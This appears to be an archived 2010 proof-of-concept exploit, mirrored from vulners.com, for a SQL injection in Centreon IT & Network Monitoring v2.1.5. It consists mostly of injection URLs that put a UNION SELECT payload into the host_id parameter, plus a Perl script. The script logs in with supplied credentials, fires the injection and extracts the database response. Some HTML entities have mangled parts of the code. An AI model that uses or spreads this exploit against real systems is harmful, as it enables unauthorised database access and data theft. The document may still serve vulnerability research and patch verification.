Vulnerability Centreon IT & Network Monitoring v2.1.5

2010-04-0500:00:00

vulners.com

JSON

#!/usr/bin/perl

//--------[PoC]---------//

Title : Centreon IT & Network Monitoring v2.1.5 - Injection SQL

Version : 2.1.5

Author : Jonathan Salwan ([email protected])

[Vuln sql injection]

http://localhost/centreon/main.php?p=201&host_id=-1%20[SQL

Injection]&o=p&min=1

http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT

1,@@version,3,4,5&o=p&min=1

//-------[Credit]-------//

http://www.sysdream.com/article.php?story_id=328&section_id=78

http://www.shell-storm.org

use LWP::UserAgent;

my $url = 'http://localhost/centreon/index.php';
my $login = 'login';
my $paswd = 'pwd';
my $sql = 'http://localhost/centreon/main.php?p=201&host_id=-1 UNION
SELECT 1,@@version,3,4,5&o=p&min=1';

my $ua = LWP::UserAgent->new;
my $response = $ua->get($url);
my $cook = $response->header('Set-Cookie');

my $req2 = $ua->post($url,
{useralias => $login, password => $paswd, submit =>
'login'},
Cookie => $cook,
Content-Type => 'application/x-www-form-urlencoded'
);

my $response = $ua->get($sql, Cookie => $cook);
my $content = $response->content();

    open&#40;FILE, &#39;&gt;sql-centreon.txt&#39;&#41;;
    print FILE $content;
    close&#40;FILE&#41;;

    print &quot;&#92;n[Answer SQL Injection]&#92;n&#92;n&quot;;

    my $selection = system&#40;&#39;cat sql-centreon.txt | grep

">Host</td>"');
unlink('sql-centreon.txt');

print "\n";